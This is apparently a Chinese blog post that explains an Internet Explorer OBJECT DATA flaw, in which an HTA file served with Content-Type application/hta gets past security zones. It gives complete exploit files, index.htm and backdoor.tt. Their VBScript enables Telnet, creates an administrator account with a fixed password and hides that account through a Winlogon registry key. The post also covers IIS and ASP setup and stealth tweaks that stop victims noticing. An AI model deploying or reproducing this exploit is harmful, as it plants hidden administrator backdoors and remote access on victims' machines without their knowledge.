由于IE处理对象标记 OBJECT 的 DATA 标签时没有正确处理要被装载的文件参数,当"OBJECT"标记中用于设置对象的MIME类型的"Type"属性不为空时,IE会根据标记中的"Type"值装载文件,此时若控件不安全则IE会提示是否执行,但当"Type"属性为空时,IE会根据服务器返回的 HTTP 头中的 Content-Type 来处理数据,此时却没有充分检查被装载的文件属性,也就是说如果服务器返回的HTTP头中的 Content-Type 是 application/hta 等,那么脚本就会绕过安全区域限制而能够执行。
可以通过此漏洞开放机器的telnet服务器,并且在服务器上面添加一个admin用户,密码是myadmin,代码由两个文件组成,一个是html文件,因为html不能直接执行代码,html用于使tt文件的代码执行。代码如下:
index.htm 文件代码:
<html>
<head><title></title>
</head>
<body>
利用“IE Object Data 远程执行漏洞”添加用户并打开系统的telnet服务
<object data="backdoor.tt"></object>
</body></html>
backdoor.tt 文件代码:
<html>
<head>
<title></title>
<script language="VBScript">
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
set ws=CreateObject("WScript.Shell")
ws.run"%Systemroot%/system32/sc.exe config tlntsvr start= auto",0
ws.run"%Systemroot%/system32/tlntadmn.exe start",0
ws.run"%Systemroot%/system32/net.exe user admin myadmin /add",0
ws.run"%Systemroot%/system32/net.exe localgroup administrators admin /add",0
ws.run"%Systemroot%/system32/reg.exe add ""HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList"" /v admin /t REG_DWORD /d 0x0",0
</script>
<body></body>
</html>
单单把代码放到服务器上面是不能够直接执行的,因为tt文件的返回类型不是application/hta,即使后缀改为.hta也不行,必须要进行iis服务器设置,可以在iis添加mime类型就可以了。步骤如下:1。打开iis网站的属性。2。选择http头标签。3。选择mime类型。4。新建一个类型对应,在扩展名上写.tt,在mime类型里面写application/hta。确定后应用就可以生效。
改进1:
用上面的代码所产生的结果会在ie弹出一个窗口,使人怀疑是否中毒,可以通过修改backdoor.tt的代码,使窗口不弹出来,方法很简单,在<html>标签后面加上如下语句<HTA:APPLICATION caption="no" border="none" windowState="minimize" visiable="no" showintaskbar="no">,然后在执行完</script>前加上Window.Close()这样窗口就基本上相当于隐藏了。
改进2:
上面的要通过设置iis服务器,可以通过asp发送文件头的方式使ie认为asp文件是aplication/hta类型文件,这样就可以执行代码了。方法如下:将backdoor.tt改为backdoor.asp,在backdoor.asp的最开始加上如下语句<%response.ContentType="application/hta"%>。相对应的,index.htm文件也要将backdoor.tt修改为backdoor.asp。
扫一扫
1325
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
